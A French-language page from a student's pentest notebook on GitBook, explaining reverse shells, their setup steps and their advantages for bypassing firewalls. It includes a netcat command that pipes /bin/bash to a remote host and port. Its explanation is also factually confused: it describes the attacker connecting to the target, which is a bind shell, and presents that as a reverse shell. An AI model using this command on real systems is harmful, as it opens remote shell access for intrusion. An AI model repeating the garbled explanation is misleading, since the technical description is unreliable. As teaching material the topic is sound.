Cybersec Student
  • ⌚Kalix's Notebook
  • Méthodologie
  • Enumeration
    • Utilisation de nmap
    • SSH
    • HTTP
    • FTP
    • SMB
    • SMTP
    • SQL
    • Liste des ports communs
  • Scan de Vulnérabilités
    • Nessus
    • Nmap Script Engine
    • Scan de vulnerabilites avec Metasploit
    • Banner grabbing avec netcat
  • Exploitation
    • Bind Shell
    • Reverse Shell
    • Obfuscation de script Powershell
    • Compilation cross platform d'exploit
    • Evasion d'AV avec Shellter
    • Recherche d'exploits public
    • Exploitations communes
  • Post-Exploitation
    • Windows
      • Post Exploitation Windows Enumération
      • Abus de Configurations Incorrectes de Services Cheatsheet
      • Abus de logiciels vulnerables Cheatsheet
      • Abus de Privileges dangereux Cheatsheet
      • Strategie AlwaysInstallElevated
      • Extractions de Mots de Passe aux Emplacements Habituels Cheatsheet
      • Taches Planifiees Cheatsheet
      • Extractions et cracking Windows
      • Persistence Windows
    • Linux
      • Post Exploitation Linux Enumeration
      • SUID
      • SUDO
      • PATH
      • NFS
      • Kernel Exploits
      • Cron Jobs
      • Capabilities
      • Persistence Linux
      • Extractions et cracking Linux
    • Pivotage
    • Transfert de fichier
    • Upgrade de Shell
  • Pentest d'application web
    • Scan d'application web Nikto
    • Enumeration de dossiers et fichiers
    • Attaques XSS
    • Injections SQL
    • HTTP login avec Hydra
    • Login avec Burp
  • Outils
    • Liste exhaustive d'outils pour le pentest
    • Masscan
    • DNSenum
    • theHarvester
    • SQLMap
    • XSSer
    • WPscan
    • Netcat
    • Mimikatz
    • Cadaver
    • Windows Exploit Suggester
    • Linux Exploit Suggester
    • LinEnum
    • Shred
    • John
    • Hashcat
    • Impacket
    • Burp Suite
    • Wireshark
    • Autorecon
    • Evil-WinRM
    • CrackMapExec
    • MSFVenom
    • Joomscan
    • Binwalk
    • Steghide
  • OSINT
    • Recherches avancees Google
  • Scripting
    • Basic Powershell
  • Cryptographie
    • GPG
  • Cheatsheet ingénierie sociale
    • Gophish
  • Cheatsheet Réseaux
  • 🖤README.md
  • ⚠️Rapports de CTF
Powered by GitBook
On this page
  1. Exploitation

Reverse Shell

Qu'est-ce qu'un Reverse Shell ?

Un reverse shell est une technique de piratage où l'attaquant crée un serveur (généralement un shell) sur sa machine et le fait se connecter à la cible vulnérable via un port spécifié. Une fois la connexion établie, l'attaquant peut exécuter des commandes sur la machine cible et récupérer les résultats via la connexion réseau.

Étapes pour configurer un Reverse Shell :

  1. Création du serveur : L'attaquant crée un serveur (ex. un shell) sur sa machine en écoutant sur un port spécifique.

  2. Identification de la cible : L'attaquant identifie la cible vulnérable et son adresse IP pour établir la connexion.

  3. Connexion à la cible : L'attaquant se connecte à la machine cible en spécifiant l'adresse IP et le port du serveur.

  4. Contrôle de la cible : Une fois la connexion établie, l'attaquant peut exécuter des commandes sur la machine cible et récupérer les résultats via la connexion réseau.

Avantages du Reverse Shell :

  • Bypass des pare-feux sortants : Souvent, les pare-feux sont configurés pour autoriser les connexions sortantes, ce qui facilite l'utilisation d'un reverse shell.

  • Port-forwarding inutile : Contrairement au bind shell, l'attaquant n'a pas besoin de configurer le port-forwarding sur son routeur pour écouter les connexions entrantes.

Exemple d'utilisation de Reverse Shell : Supposons que l'attaquant ait créé un reverse shell sur sa machine, écoutant sur le port 4444, et que la cible vulnérable soit sur l'adresse IP 192.168.1.100 :

  1. Attaquant (IP : 1.2.3.4) : nc 192.168.1.100 4444 -e /bin/bash

Une fois que la connexion est établie, l'attaquant peut exécuter des commandes sur la machine cible et obtenir les résultats via la connexion réseau.

PreviousBind ShellNextObfuscation de script Powershell

Last updated 1 year ago